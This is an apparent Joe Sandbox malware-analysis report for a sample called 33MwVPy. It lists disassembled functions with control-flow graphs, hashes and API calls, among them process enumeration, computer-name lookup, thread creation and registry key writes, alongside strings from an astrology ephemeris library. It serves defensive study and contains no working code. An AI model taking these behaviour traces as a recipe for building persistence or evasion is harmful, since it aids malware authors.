                                • API ID: wsprintf$CloseComputerCreateErrorHandleLastMutexNamelstrcpy
                                • String ID: Time$long$tasktime
                                • API String ID: 172913010-2011194240
                                • Opcode ID: 18c389d78b71260914e67dd970c387743a4d043c92a2ccdab54cdcf64fc39b9a
                                • Instruction ID: fdbe4bd0be62d1fc7a4c7fa3e0aaac4247286d7f8c664be7a572e76097edb7d8
                                • Opcode Fuzzy Hash: 18c389d78b71260914e67dd970c387743a4d043c92a2ccdab54cdcf64fc39b9a
                                • Instruction Fuzzy Hash: 7461BA75A00219ABFB24EB64CD85F9E73ADEF40340F110596F709E6182DF74AA84CBA5
                                Function 1000B4B0 Relevance: 15.4, APIs: 10, Instructions: 414stringprocessCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1877 1000b4b0-1000b4f3 1878 1000b683-1000b6db call 1000a360 1877->1878 1879 1000b4f9-1000b52c call 1003b910 call 1003a765 1877->1879 1889 1000b6e1-1000b701 1878->1889 1890 1000b82b-1000b830 1878->1890 1887 1000b532-1000b53e 1879->1887 1888 1000b625-1000b639 call 1003a765 1879->1888 1893 1000b540-1000b577 CreateToolhelp32Snapshot call 10038be4 Process32FirstW 1887->1893 1900 1000b647-1000b65f 1888->1900 1901 1000b63b-1000b640 1888->1901 1905 1000b703-1000b723 1889->1905 1906 1000b729-1000b737 1889->1906 1891 1000b832-1000b834 1890->1891 1892 1000b838-1000b83d 1890->1892 1891->1892 1895 1000b845-1000b84a 1892->1895 1896 1000b83f-1000b841 1892->1896 1910 1000b579-1000b588 lstrcmpiW 1893->1910 1911 1000b5bb-1000b5da CloseHandle call 10038c14 1893->1911 1902 1000b852-1000b856 1895->1902 1903 1000b84c-1000b84e 1895->1903 1896->1895 1907 1000b662-1000b66b 1900->1907 1901->1900 1908 1000b885-1000b893 call 1000fed0 1902->1908 1909 1000b858-1000b883 call 1000a360 1902->1909 1903->1902 1905->1890 1905->1906 1915 1000b740-1000b742 1906->1915 1907->1907 1914 1000b66d-1000b67e call 1000a360 1907->1914 1929 1000b898-1000b8ce 1908->1929 1909->1929 1918 1000b5b5-1000b5b8 1910->1918 1919 1000b58a-1000b594 Process32NextW 1910->1919 1926 1000b5f8-1000b61c call 1003a765 1911->1926 1927 1000b5dc-1000b5f1 1911->1927 1934 1000b997-1000b9b3 call 10038bd3 1914->1934 1915->1890 1921 1000b748-1000b765 1915->1921 1918->1911 1919->1911 1925 1000b596-1000b5a5 lstrcmpiW 1919->1925 1921->1890 1943 1000b76b-1000b77e 1921->1943 1925->1918 1930 1000b5a7-1000b5b1 Process32NextW 1925->1930 1926->1893 1950 1000b622 1926->1950 1927->1926 1931 1000b8d0-1000b8dc 1929->1931 1932 1000b927-1000b929 1929->1932 1930->1925 1933 1000b5b3 1930->1933 1937 1000b913-1000b923 1931->1937 1938 1000b8de-1000b8f0 1931->1938 1941 1000b961-1000b967 1932->1941 1942 1000b92b-1000b931 1932->1942 1933->1911 1937->1932 1945 1000b8f2-1000b900 1938->1945 1946 1000b906-1000b910 call 10038c14 1938->1946 1941->1934 1951 1000b969-1000b97b 1941->1951 1942->1941 1948 1000b933-1000b945 1942->1948 1943->1892 1949 1000b784-1000b78a 1943->1949 1945->1946 1954 1000b9b4 call 100414c7 1945->1954 1946->1937 1956 1000b957-1000b95e call 10038c14 1948->1956 1957 1000b947-1000b955 1948->1957 1958 1000b790-1000b7a6 1949->1958 1950->1888 1952 1000b98d-1000b994 call 10038c14 1951->1952 1953 1000b97d-1000b98b 1951->1953 1952->1934 1953->1952 1959 1000b9be-1000b9c3 call 100414c7 1953->1959 1963 1000b9b9 call 100414c7 1954->1963 1956->1941 1957->1956 1957->1963 1971 1000b828 1958->1971 1972 1000b7ac-1000b7c6 1958->1972 1963->1959 1971->1890 1974 1000b7c8-1000b7cd 1972->1974 1975 1000b80f-1000b81d 1972->1975 1976 1000b809-1000b80c 1974->1976 1977 1000b7cf-1000b7d3 1974->1977 1975->1958 1983 1000b823-1000b826 1975->1983 1976->1975 1978 1000b7e4-1000b7ec 1977->1978 1979 1000b7d5-1000b7df call 100101a0 1977->1979 1982 1000b7f0-1000b7f9 1978->1982 1979->1978 1982->1982 1984 1000b7fb-1000b804 call 100101a0 1982->1984 1983->1892 1984->1976
                                APIs
                                • _wcsstr.LIBVCRUNTIME ref: 1000B51C
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000B550
                                • Process32FirstW.KERNEL32(00000000,00000000), ref: 1000B56F
                                • lstrcmpiW.KERNEL32(00000024,?), ref: 1000B580
                                • Process32NextW.KERNEL32(00000000,00000000), ref: 1000B58C
                                • lstrcmpiW.KERNEL32(00000024,?), ref: 1000B59D
                                • Process32NextW.KERNEL32(00000000,00000000), ref: 1000B5A9
                                • CloseHandle.KERNEL32(00000000), ref: 1000B5BC
                                • _wcsstr.LIBVCRUNTIME ref: 1000B612
                                • _wcsstr.LIBVCRUNTIME ref: 1000B62F
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883591978.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_10001000_33MwVPy.jbxd
                                Similarity
                                • API ID: Process32_wcsstr$Nextlstrcmpi$CloseCreateFirstHandleSnapshotToolhelp32
                                • String ID:
                                • API String ID: 727710055-0
                                • Opcode ID: 74624c8c618551669e3d91651b5024e9fb6ba0012caf886f3360ed4b7693b94d
                                • Instruction ID: b2bcd0be8440f84f9ca42e084e2990dc196e099689ef7adbacb0db17711209f8
                                • Opcode Fuzzy Hash: 74624c8c618551669e3d91651b5024e9fb6ba0012caf886f3360ed4b7693b94d
                                • Instruction Fuzzy Hash: 6EE1AE70E00709ABEB14CFA4CC49FAEB7B5FF45784F104128F605AB295DBB5A941CB54
                                Function 1001F9A0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 291sleepthreadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1986 1001f9a0-1001f9fb call 1001cba0 1989 1001fa00-1001fa09 1986->1989 1989->1989 1990 1001fa0b-1001fa41 call 1000a360 call 1001bd50 1989->1990 1995 1001fa43-1001fa58 1990->1995 1996 1001fa78-1001fab2 1990->1996 1997 1001fa5a-1001fa68 1995->1997 1998 1001fa6e-1001fa75 call 10038c14 1995->1998 1999 1001fab8-1001fabd 1996->1999 1997->1998 2001 1001fdd2 call 100414c7 1997->2001 1998->1996 1999->1999 2002 1001fabf-1001fac5 1999->2002 2009 1001fdd7-1001fddf call 100414c7 2001->2009 2005 1001fd8b-1001fd8e 2002->2005 2006 1001facb-1001fb04 call 1003b910 SHGetSpecialFolderPathA call 10048791 2002->2006 2007 1001fd90-1001fd9b 2005->2007 2008 1001fdb7-1001fdd1 call 10038bd3 2005->2008 2022 1001fd74-1001fd85 Sleep 2006->2022 2023 1001fb0a 2006->2023 2012 1001fdad-1001fdb4 call 10038c14 2007->2012 2013 1001fd9d-1001fdab 2007->2013 2012->2008 2013->2009 2013->2012 2022->2005 2024 1001fb10-1001fb33 wsprintfA 2023->2024 2025 1001fb36-1001fb3b 2024->2025 2025->2025 2026 1001fb3d-1001fb3f 2025->2026 2027 1001fb45-1001fb63 call 10048867 2026->2027 2028 1001fd5d-1001fd6e call 10048791 2026->2028 2027->2028 2033 1001fb69-1001fb86 call 10048c3c call 10048786 2027->2033 2028->2022 2028->2024 2033->2028 2038 1001fb8c-1001fb9f call 10039180 2033->2038 2038->2028 2041 1001fba5-1001fbd5 call 10048c3c call 10048e3f call 100488f5 2038->2041 2041->2028 2048 1001fbdb-1001fbde 2041->2048 2049 1001fbe0-1001fbee 2048->2049 2050 1001fc39-1001fc3b 2048->2050 2051 1001fbf0-1001fc37 2049->2051 2052 1001fc49-1001fc4b 2050->2052 2053 1001fc3d 2050->2053 2051->2050 2051->2051 2052->2028 2054 1001fc51-1001fd0d call 10038be4 call 1003b910 call 10020230 call 10020110 CreateThread CloseHandle 2052->2054 2055 1001fc40-1001fc47 2053->2055 2054->2028 2064 1001fd0f-1001fd1f 2054->2064 2055->2052 2055->2055 2065 1001fd21-1001fd2f 2064->2065 2066 1001fd35-1001fd53 call 10038c14 2064->2066 2065->2001 2065->2066 2066->2028
                                APIs
                                  • Part of subcall function 1001CBA0: GetComputerNameW.KERNEL32(?,00000200), ref: 1001CBF5
                                  • Part of subcall function 1001CBA0: lstrcpyW.KERNEL32(?,10077510), ref: 1001CC0B
                                  • Part of subcall function 1001CBA0: wsprintfW.USER32 ref: 1001CC37
                                • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,00000000,10081068,00000000,00000000), ref: 1001FAEE
                                • wsprintfA.USER32 ref: 1001FB24
                                • __fread_nolock.LIBCMT ref: 1001FBBE
                                • CreateThread.KERNEL32(00000000,00000000,1001F2E0,00000000,00000000,00000000), ref: 1001FCF4
                                • CloseHandle.KERNEL32(00000000), ref: 1001FCFB
                                • Sleep.KERNEL32(000001F4), ref: 1001FD79
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883591978.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_10001000_33MwVPy.jbxd
                                Similarity
                                • API ID: wsprintf$CloseComputerCreateFolderHandleNamePathSleepSpecialThread__fread_nolocklstrcpy
                                • String ID: ARPD
                                • API String ID: 1341197143-2799616583
                                • Opcode ID: 1338866b2c3a02d0ec336459f934162f21c62a7b88ae211b20dd733c10737ede
                                • Instruction ID: c6e7b88f8f3cbc9786cc4e93138ed0c2f04f0de870f558174a7f8b61b1f02c7c
                                • Opcode Fuzzy Hash: 1338866b2c3a02d0ec336459f934162f21c62a7b88ae211b20dd733c10737ede
                                • Instruction Fuzzy Hash: 4DB13971D00A589BDB25CB24CC55BFEB771EF55305F1082D8E908AB292EB74ABC58F90
                                Function 6C294AFA Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 91COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2069 6c294afa-6c294b24 2070 6c294b3b-6c294b5a call 6c2f2a1f call 6c2f2220 2069->2070 2071 6c294b26-6c294b29 call 6c2947b5 2069->2071 2081 6c294b5c-6c294b82 call 6c2f1f84 call 6c2917c6 2070->2081 2082 6c294b84-6c294b8d call 6c2f3b76 2070->2082 2074 6c294b2e-6c294b35 2071->2074 2074->2070 2076 6c294bec-6c294c06 call 6c2f1f75 2074->2076 2093 6c294beb 2081->2093 2088 6c294b9d-6c294ba6 call 6c2f3b76 2082->2088 2089 6c294b8f-6c294b9b call 6c2f2a1f 2082->2089 2096 6c294ba8-6c294bb2 2088->2096 2097 6c294bb4-6c294bbc 2088->2097 2089->2082 2089->2088 2093->2076 2096->2093 2098 6c294bbd-6c294bc6 call 6c2f3b76 2097->2098 2101 6c294bc8-6c294bd8 call 6c2f2a1f 2098->2101 2102 6c294be3 2098->2102 2101->2102 2105 6c294bda-6c294be1 2101->2105 2102->2093 2105->2098 2105->2102
                                APIs
                                • _fgetc.LIBCMT ref: 6C294B43
                                • _sprintf.LIBCMT ref: 6C294B6F
                                  • Part of subcall function 6C2947B5: _sprintf.LIBCMT ref: 6C2947FA
                                  • Part of subcall function 6C2947B5: _sprintf.LIBCMT ref: 6C294846
                                  • Part of subcall function 6C2947B5: GetModuleFileNameA.KERNEL32(?,000000FF,?,?,?,00000000,00000000), ref: 6C294860
                                  • Part of subcall function 6C2947B5: _sprintf.LIBCMT ref: 6C2948A1
                                  • Part of subcall function 6C2947B5: _sprintf.LIBCMT ref: 6C2948D5
                                  • Part of subcall function 6C2947B5: _sprintf.LIBCMT ref: 6C29491C
                                • _fgetc.LIBCMT ref: 6C294B90
                                • _fgetc.LIBCMT ref: 6C294BC9
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883695684.000000006C271000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C270000, based on PE: true
                                • Associated: 00000006.00000002.3883679260.000000006C270000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883747359.000000006C31D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883794677.000000006C367000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883816323.000000006C369000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883845237.000000006C38D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883872112.000000006C38E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C390000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C393000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C398000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C39C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C39E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C3A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883992161.000000006C3A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6c270000_33MwVPy.jbxd
                                Similarity
                                • API ID: _sprintf$_fgetc$FileModuleName
                                • String ID: $@$The command file '%s' is not in any valid format (character %d).
                                • API String ID: 1310815430-447543786
                                • Opcode ID: aac9fcf2655e662dc287ac6928a714fa99db9a1363b3fcbea1f8e3a591cb0011
                                • Instruction ID: ef90eec2614593c11090a67f2dff791824997e8cb6373b9e9f66fa9166d24a82
                                • Opcode Fuzzy Hash: aac9fcf2655e662dc287ac6928a714fa99db9a1363b3fcbea1f8e3a591cb0011
                                • Instruction Fuzzy Hash: BE21EAA1D4511D59DB219A2ADC50FDEB7BCAF8321CF100199FE28B3B40DB384A874A95
                                Function 6C2B83BC Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 174COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2106 6c2b83bc-6c2b83ee 2107 6c2b83fd 2106->2107 2108 6c2b83f0-6c2b83fb 2106->2108 2109 6c2b8403-6c2b8411 2107->2109 2108->2109 2110 6c2b8413-6c2b841b 2109->2110 2110->2110 2111 6c2b841d-6c2b844d call 6c2c79d0 2110->2111 2114 6c2b8453-6c2b8466 2111->2114 2115 6c2b8575-6c2b85a3 call 6c2f1f84 2111->2115 2117 6c2b8468-6c2b8470 2114->2117 2122 6c2b85b9 2115->2122 2123 6c2b85a5-6c2b85ad 2115->2123 2117->2117 2119 6c2b8472-6c2b8484 2117->2119 2120 6c2b848e-6c2b8494 2119->2120 2121 6c2b8486-6c2b848c 2119->2121 2125 6c2b8497-6c2b849c 2120->2125 2124 6c2b84c8-6c2b84ce 2121->2124 2127 6c2b85bb-6c2b85c9 call 6c2f1f75 2122->2127 2126 6c2b85af-6c2b85b7 2123->2126 2129 6c2b84d1-6c2b84d6 2124->2129 2125->2125 2128 6c2b849e-6c2b84a6 2125->2128 2126->2122 2126->2126 2128->2124 2131 6c2b84a8-6c2b84b0 2128->2131 2129->2129 2132 6c2b84d8-6c2b84e2 2129->2132 2131->2124 2134 6c2b84b2-6c2b84b8 2131->2134 2135 6c2b84e5-6c2b84ea 2132->2135 2136 6c2b84b9-6c2b84bf 2134->2136 2135->2135 2137 6c2b84ec-6c2b84f7 2135->2137 2136->2136 2138 6c2b84c1-6c2b84c6 2136->2138 2139 6c2b85ca-6c2b85d0 2137->2139 2140 6c2b84fd-6c2b8503 2137->2140 2138->2124 2139->2122 2141 6c2b85d2-6c2b85e6 call 6c2f1f84 2139->2141 2142 6c2b8505-6c2b850a 2140->2142 2141->2122 2142->2142 2144 6c2b850c-6c2b8514 2142->2144 2145 6c2b8515-6c2b851b 2144->2145 2145->2145 2147 6c2b851d-6c2b853b 2145->2147 2148 6c2b853d-6c2b8545 2147->2148 2148->2148 2149 6c2b8547-6c2b8552 call 6c2f24fa 2148->2149 2151 6c2b8557-6c2b855b 2149->2151 2151->2127 2152 6c2b855d-6c2b856f 2151->2152 2152->2114 2152->2115
                                APIs
                                Strings
                                • SwissEph file '%s' not found in PATH '%s', xrefs: 6C2B8587
                                • .;C:\Astrolog\, xrefs: 6C2B83DE
                                • error: file path and name must be shorter than %d., xrefs: 6C2B85D3
                                • \, xrefs: 6C2B84A8
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883695684.000000006C271000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C270000, based on PE: true
                                • Associated: 00000006.00000002.3883679260.000000006C270000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883747359.000000006C31D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883794677.000000006C367000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883816323.000000006C369000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883845237.000000006C38D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883872112.000000006C38E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C390000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C393000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C398000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C39C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C39E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C3A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883992161.000000006C3A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6c270000_33MwVPy.jbxd
                                Similarity
                                • API ID: _sprintf
                                • String ID: .;C:\Astrolog\$SwissEph file '%s' not found in PATH '%s'$\$error: file path and name must be shorter than %d.
                                • API String ID: 1467051239-2281980244
                                • Opcode ID: 7d507f1366c45cd15eaf54f3cf16c5c53a9b55a6974b5bc076ff2419a9df6868
                                • Instruction ID: fe7ecd13c2415beac09cf99b3d4948409ebefc9b97952395b4c3f6f0515782d1
                                • Opcode Fuzzy Hash: 7d507f1366c45cd15eaf54f3cf16c5c53a9b55a6974b5bc076ff2419a9df6868
                                • Instruction Fuzzy Hash: 9B51F5B0A0416E8FCB11DE289D546D9BBF5AB4530CF04C6F5DA9CF7602E6704AC98F54
                                Function 1001F1B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 100registrylibrarystringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2153 1001f1b0-1001f262 LoadLibraryW RegCreateKeyExW 2160 1001f264-1001f279 RegOpenKeyExW 2153->2160 2161 1001f2a7-1001f2ae call 1001f2cd 2153->2161 2160->2161 2162 1001f27b-1001f2a4 lstrlenW RegSetValueExW 2160->2162 2164 1001f2b3-1001f2c6 2161->2164 2162->2161
                                APIs
                                • LoadLibraryW.KERNEL32(100782C8,10081068), ref: 1001F1F4
                                • RegCreateKeyExW.KERNEL32(80000001,1003AC40,00000000,00000000,00000000,000F003F,00000000,000000FE,?), ref: 1001F25D
                                • RegOpenKeyExW.KERNEL32(80000001,1003AC40,00000000,0002001F,000000FE), ref: 1001F274
                                • lstrlenW.KERNEL32(?), ref: 1001F27F
                                • RegSetValueExW.KERNEL32(000000FE,?,00000000,00000001,?,00000000), ref: 1001F297
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883591978.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_10001000_33MwVPy.jbxd
                                Similarity
                                • API ID: CreateLibraryLoadOpenValuelstrlen
                                • String ID: Time
                                • API String ID: 1375638161-3483776891
                                • Opcode ID: 66dc3ac0a5c7e6bf8b4a1d02e65aac9550fe6383deacdd14883f52ca131d7556
                                • Instruction ID: da749f221406ebe725311cc99906b7a6f75a18cf87e871c10c78f3a2f2c99309
                                • Opcode Fuzzy Hash: 66dc3ac0a5c7e6bf8b4a1d02e65aac9550fe6383deacdd14883f52ca131d7556
                                • Instruction Fuzzy Hash: 9E313A71D0022DBFEB00DFA9CC84EEEBABDEF49654F10412AFA15E2210DB7859408B64
                                Function 6C2BFAA9 Relevance: 9.3, APIs: 2, Strings: 3, Instructions: 599COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2165 6c2bfaa9-6c2bfae9 2166 6c2bfaeb 2165->2166 2167 6c2bfaee-6c2bfb0c call 6c2bf16f call 6c2b66bd 2165->2167 2166->2167 2172 6c2bfb0e-6c2bfb15 2167->2172 2173 6c2bfb2d-6c2bfb39 2167->2173 2172->2173 2176 6c2bfb17-6c2bfb19 2172->2176 2174 6c2bfb3b-6c2bfb47 call 6c2b6655 2173->2174 2175 6c2bfb93-6c2bfba3 2173->2175 2185 6c2bfb49-6c2bfb4e call 6c2b13bf 2174->2185 2186 6c2bfb55-6c2bfb5a 2174->2186 2177 6c2bfba5-6c2bfbac 2175->2177 2178 6c2bfbc4 2175->2178 2176->2173 2180 6c2bfb1b-6c2bfb2b 2176->2180 2177->2178 2181 6c2bfbae-6c2bfbc2 call 6c2b9261 2177->2181 2183 6c2bfbc6-6c2bfc49 call 6c2befae call 6c2bf064 call 6c2f1f84 2178->2183 2180->2173 2181->2183 2204 6c2bfc4b-6c2bfc51 2183->2204 2205 6c2bfc53 2183->2205 2185->2186 2190 6c2bfb5f-6c2bfb63 2186->2190 2193 6c2bfb6c-6c2bfb86 call 6c2fedb0 2190->2193 2194 6c2bfb65-6c2bfb6b call 6c2f28b7 2190->2194 2193->2190 2203 6c2bfb88-6c2bfb8e 2193->2203 2194->2193 2203->2175 2206 6c2bfc59-6c2bfc72 2204->2206 2205->2206 2207 6c2bfc7e-6c2bfc8e 2206->2207 2208 6c2bfc74-6c2bfc7c 2206->2208 2209 6c2bfc94-6c2bfccd call 6c2c301a 2207->2209 2208->2209 2212 6c2bfccf-6c2bfd0f call 6c2c817c call 6c2c4712 * 2 2209->2212 2213 6c2bfd12-6c2bfd21 2209->2213 2212->2213 2215 6c2bfd5d-6c2bfd75 2213->2215 2216 6c2bfd23-6c2bfd40 call 6c2c5db6 call 6c2b85e8 2213->2216 2217 6c2bfde8-6c2bfdf1 2215->2217 2218 6c2bfd77-6c2bfd79 2215->2218 2216->2215 2241 6c2bfd42-6c2bfd5a call 6c2c5c0c 2216->2241 2221 6c2bfdf3-6c2bfe20 call 6c2c0e52 2217->2221 2222 6c2bfe70-6c2bfe77 2217->2222 2223 6c2bfd7b-6c2bfd7d 2218->2223 2224 6c2bfd7f-6c2bfdb1 call 6c2b726b 2218->2224 2242 6c2bfdb3-6c2bfdb6 2221->2242 2243 6c2bfe22-6c2bfe41 call 6c2c0e52 2221->2243 2229 6c2bfe9b-6c2bfea0 2222->2229 2230 6c2bfe79-6c2bfe7c 2222->2230 2223->2217 2223->2224 2224->2242 2246 6c2bfdbb-6c2bfddc call 6c2b726b 2224->2246 2239 6c2bfecb-6c2bfecf 2229->2239 2240 6c2bfea2-6c2bfea5 2229->2240 2235 6c2bfe7e-6c2bfe81 2230->2235 2236 6c2bfe83-6c2bfe99 2230->2236 2235->2229 2235->2236 2236->2229 2244 6c2c0006-6c2c000c 2239->2244 2245 6c2bfed5-6c2bfeeb 2239->2245 2240->2239 2248 6c2bfea7 2240->2248 2241->2215 2254 6c2c0229-6c2c0237 call 6c2f1f75 2242->2254 2243->2242 2264 6c2bfe47-6c2bfe6c 2243->2264 2249 6c2bfea9-6c2bfeaf 2244->2249 2250 6c2c0012-6c2c001b 2244->2250 2253 6c2bfeed-6c2bff15 2245->2253 2261 6c2bfde1-6c2bfde6 2246->2261 2248->2249 2256 6c2bfeb1-6c2bfec7 2249->2256 2263 6c2c0026 2250->2263 2253->2253 2259 6c2bff17-6c2bff1d 2253->2259 2256->2256 2262 6c2bfec9 2256->2262 2265 6c2bff1f-6c2bff26 2259->2265 2266 6c2bff43-6c2bff45 2259->2266 2261->2217 2261->2242 2262->2259 2268 6c2c002b-6c2c0031 2263->2268 2264->2264 2269 6c2bfe6e 2264->2269 2265->2266 2270 6c2bff28-6c2bff40 call 6c2babd5 2265->2270 2271 6c2bff47-6c2bff4e 2266->2271 2272 6c2bff76-6c2bff7d 2266->2272 2275 6c2c0041-6c2c004a 2268->2275 2276 6c2c0033-6c2c0040 call 6c2ba73a 2268->2276 2269->2229 2270->2266 2271->2272 2278 6c2bff50-6c2bff73 call 6c2ba96a 2271->2278 2273 6c2bff7f-6c2bff91 call 6c2b85e8 2272->2273 2274 6c2bffb2-6c2bffc1 2272->2274 2293 6c2bff9c-6c2bffaf call 6c2c5c0c 2273->2293 2294 6c2bff93-6c2bff9a 2273->2294 2274->2263 2281 6c2bffc3-6c2bffe4 call 6c2c4712 2274->2281 2282 6c2c0050-6c2c0076 call 6c2c2d1d 2275->2282 2283 6c2c00e3-6c2c00ea 2275->2283 2276->2275 2278->2272 2304 6c2bffff-6c2c0004 2281->2304 2305 6c2bffe6-6c2bfffc call 6c2ba5e7 2281->2305 2306 6c2c0078-6c2c0092 call 6c2c2d1d 2282->2306 2307 6c2c0095-6c2c0097 2282->2307 2288 6c2c01a8-6c2c01b1 2283->2288 2289 6c2c00f0-6c2c00fa 2283->2289 2297 6c2c01bd-6c2c01c4 2288->2297 2298 6c2c01b3-6c2c01b8 call 6c2c2e6b 2288->2298 2295 6c2c00fc-6c2c010f call 6c2b9dc8 2289->2295 2296 6c2c012f-6c2c0134 2289->2296 2293->2274 2294->2274 2294->2293 2327 6c2c0112-6c2c0114 2295->2327 2310 6c2c0149-6c2c0175 call 6c2c2e6b call 6c2b9c91 2296->2310 2311 6c2c0136-6c2c0147 call 6c2b9ef2 2296->2311 2308 6c2c01ee-6c2c0208 2297->2308 2309 6c2c01c6-6c2c01c8 2297->2309 2298->2297 2304->2268 2305->2304 2306->2307 2307->2283 2320 6c2c0099-6c2c00be call 6c2c2d1d 2307->2320 2312 6c2c020a-6c2c0212 2308->2312 2313 6c2c0214-6c2c021b 2308->2313 2309->2308 2319 6c2c01ca-6c2c01d0 2309->2319 2310->2242 2339 6c2c017b-6c2c01a3 call 6c2c301a 2310->2339 2311->2327 2312->2313 2324 6c2c021d 2313->2324 2325 6c2c0221-6c2c0224 2313->2325 2330 6c2c01d2-6c2c01ea 2319->2330 2320->2283 2335 6c2c00c0-6c2c00e0 call 6c2c2d1d 2320->2335 2324->2325 2325->2254 2327->2242 2333 6c2c011a-6c2c011c 2327->2333 2330->2330 2334 6c2c01ec 2330->2334 2333->2288 2337 6c2c0122-6c2c012d 2333->2337 2334->2308 2335->2283 2337->2288 2339->2288
                                APIs
                                Strings
                                • %s,%s, xrefs: 6C2BFBF0
                                • , xrefs: 6C2BFFB2
                                • Please call swe_set_ephe_path() or swe_set_jplfile() before calling swe_fixstar() or swe_fixstar_ut(), xrefs: 6C2BFB24
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883695684.000000006C271000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C270000, based on PE: true
                                • Associated: 00000006.00000002.3883679260.000000006C270000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883747359.000000006C31D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883794677.000000006C367000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883816323.000000006C369000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883845237.000000006C38D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883872112.000000006C38E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C390000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C393000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C398000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C39C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C39E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C3A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883992161.000000006C3A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6c270000_33MwVPy.jbxd
                                Similarity
                                • API ID: _memset_sprintf
                                • String ID: $%s,%s$Please call swe_set_ephe_path() or swe_set_jplfile() before calling swe_fixstar() or swe_fixstar_ut()
                                • API String ID: 1557529856-1540576256
